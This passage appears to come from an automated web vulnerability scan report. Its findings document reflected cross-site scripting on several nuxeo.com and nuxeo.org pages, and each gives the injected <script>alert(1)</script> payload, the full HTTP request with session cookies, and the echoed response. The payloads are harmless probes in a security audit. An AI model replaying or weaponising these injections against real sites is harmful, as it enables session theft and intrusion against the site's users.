Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:47 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/about/eventsf5c36--><script>alert(1)</script>d4ffa27e9fd/nuxeoworld2010/-->
...[SNIP]...

4.419. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 76a8c--><script>alert(1)</script>892930f1e68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/about/events/nuxeoworld201076a8c--><script>alert(1)</script>892930f1e68 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:20:25 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:20:25 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/about/events/nuxeoworld201076a8c--><script>alert(1)</script>892930f1e68/-->
...[SNIP]...

4.420. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/downloads/download-dm-form

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 47d33--><script>alert(1)</script>1c4a2e654c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en47d33--><script>alert(1)</script>1c4a2e654c5/downloads/download-dm-form HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:56 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:17:56 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en47d33--><script>alert(1)</script>1c4a2e654c5/downloads/download-dm-form/-->
...[SNIP]...

4.421. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/downloads/download-dm-form

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 15bd8--><script>alert(1)</script>86fa8735a8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/downloads15bd8--><script>alert(1)</script>86fa8735a8f/download-dm-form HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:41 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 15 Nov 2010 12:18:41 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:41 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/downloads15bd8--><script>alert(1)</script>86fa8735a8f/download-dm-form/-->
...[SNIP]...

4.422. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/downloads/download-dm-form

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload df27c--><script>alert(1)</script>40a84b08494 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/downloads/download-dm-formdf27c--><script>alert(1)</script>40a84b08494 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:08 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 15 Nov 2010 12:19:08 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:08 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/downloads/download-dm-formdf27c--><script>alert(1)</script>40a84b08494/-->
...[SNIP]...

4.423. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6945d--><script>alert(1)</script>9547c34988d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en6945d--><script>alert(1)</script>9547c34988d/products/document-management/getting-started HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:51 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:17:51 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en6945d--><script>alert(1)</script>9547c34988d/products/document-management/getting-started/-->
...[SNIP]...

4.424. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 8692f--><script>alert(1)</script>841c8c775c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/products8692f--><script>alert(1)</script>841c8c775c8/document-management/getting-started HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:43 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:43 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/products8692f--><script>alert(1)</script>841c8c775c8/document-management/getting-started/-->
...[SNIP]...

4.425. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 4d655--><script>alert(1)</script>e6f61f7d157 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/products/document-management4d655--><script>alert(1)</script>e6f61f7d157/getting-started HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:20 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/products/document-management4d655--><script>alert(1)</script>e6f61f7d157/getting-started/-->
...[SNIP]...

4.426. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 74450--><script>alert(1)</script>6984a629a28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/products/document-management/getting-started74450--><script>alert(1)</script>6984a629a28 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:48 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:49 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/products/document-management/getting-started74450--><script>alert(1)</script>6984a629a28/-->
...[SNIP]...

4.427. http://www.nuxeo.com/en/services/training [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/services/training

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 71135--><script>alert(1)</script>410caedb9c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en71135--><script>alert(1)</script>410caedb9c4/services/training HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:01 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:02 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en71135--><script>alert(1)</script>410caedb9c4/services/training/-->
...[SNIP]...

4.428. http://www.nuxeo.com/en/services/training [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/services/training

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 7dac6--><script>alert(1)</script>417df72f5c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/services7dac6--><script>alert(1)</script>417df72f5c7/training HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:54 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/services7dac6--><script>alert(1)</script>417df72f5c7/training/-->
...[SNIP]...

4.429. http://www.nuxeo.com/en/services/training [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/services/training

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 38728--><script>alert(1)</script>3534a3f71fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/services/training38728--><script>alert(1)</script>3534a3f71fa HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:39 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:39 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/services/training38728--><script>alert(1)</script>3534a3f71fa/-->
...[SNIP]...

4.430. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7e1f1--><script>alert(1)</script>7e40053b44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /extension7e1f1--><script>alert(1)</script>7e40053b44/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js HTTP/1.1
Accept: */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:08:59 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=8303555f256cc3d6f8049a70f1d2db56; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:08:59 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/extension7e1f1--><script>alert(1)</script>7e40053b44/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js/-->
...[SNIP]...

4.431. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 10d63--><script>alert(1)</script>ad21aa13a8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /extension/nuxeo_design/design10d63--><script>alert(1)</script>ad21aa13a8b/nuxeo/javascript/mtcJSAPI.js HTTP/1.1
Accept: */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:09:27 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=0fb05ad10c166829ebc54c5d76671e37; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:09:27 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/extension/nuxeo_design/design10d63--><script>alert(1)</script>ad21aa13a8b/nuxeo/javascript/mtcJSAPI.js/-->
...[SNIP]...

4.432. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 3bff6--><script>alert(1)</script>be29ccef587 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /extension/nuxeo_design/design/nuxeo/javascript3bff6--><script>alert(1)</script>be29ccef587/mtcJSAPI.js HTTP/1.1
Accept: */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:09:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=213640b5ccd9e02f69c3dca67dfd6a01; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:09:54 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/extension/nuxeo_design/design/nuxeo/javascript3bff6--><script>alert(1)</script>be29ccef587/mtcJSAPI.js/-->
...[SNIP]...

4.433. http://www.nuxeo.org/discussions/index.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /discussions/index.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ade"><script>alert(1)</script>c594b43b6bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /discussions/index.jspa?d3ade"><script>alert(1)</script>c594b43b6bf=1 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:17:55 GMT
Server: Server: Jetty(6.0.x)
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=10e4g71e3s4cu;Path=/discussions
Content-Language: en
